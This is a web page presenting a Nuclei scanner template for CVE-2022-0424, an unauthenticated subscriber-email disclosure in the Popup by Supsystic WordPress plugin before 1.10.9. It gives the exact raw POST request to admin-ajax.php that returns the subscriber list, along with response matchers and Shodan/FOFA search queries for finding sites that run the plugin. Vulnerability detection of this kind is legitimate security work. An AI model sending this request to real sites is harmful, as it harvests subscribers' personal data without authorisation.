Skip to content

Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure

ID: CVE-2022-0424

Severity: medium

Author: s4e-io

Tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic

The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users

id: CVE-2022-0424
info:
name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
author: s4e-io
severity: medium
description: |
The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
remediation: Fixed in 1.10.9
reference:
- https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0424
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-0424
cwe-id: CWE-306
epss-score: 0.01488
epss-percentile: 0.86805
cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: supsystic
product: popup
framework: wordpress
shodan-query: http.html:/wp-content/plugins/popup-by-supsystic
fofa-query: body=/wp-content/plugins/popup-by-supsystic
publicwww-query: "/wp-content/plugins/popup-by-supsystic"
tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
matchers-condition: and
matchers:
- type: word
words:
- '"id":"'
- 'username":"'
- 'email":'
- 'hash":"'
- "_wpnonce"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100b66f30be17ceb92b0b50564b3a27cece1bb694e92dfea93bf64188c1174d79f702207ebaf479e39ca30ab132d5ec533b488c1c59662f1b04e035a5ba256e7765a0d6:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0424.yaml"

View on Github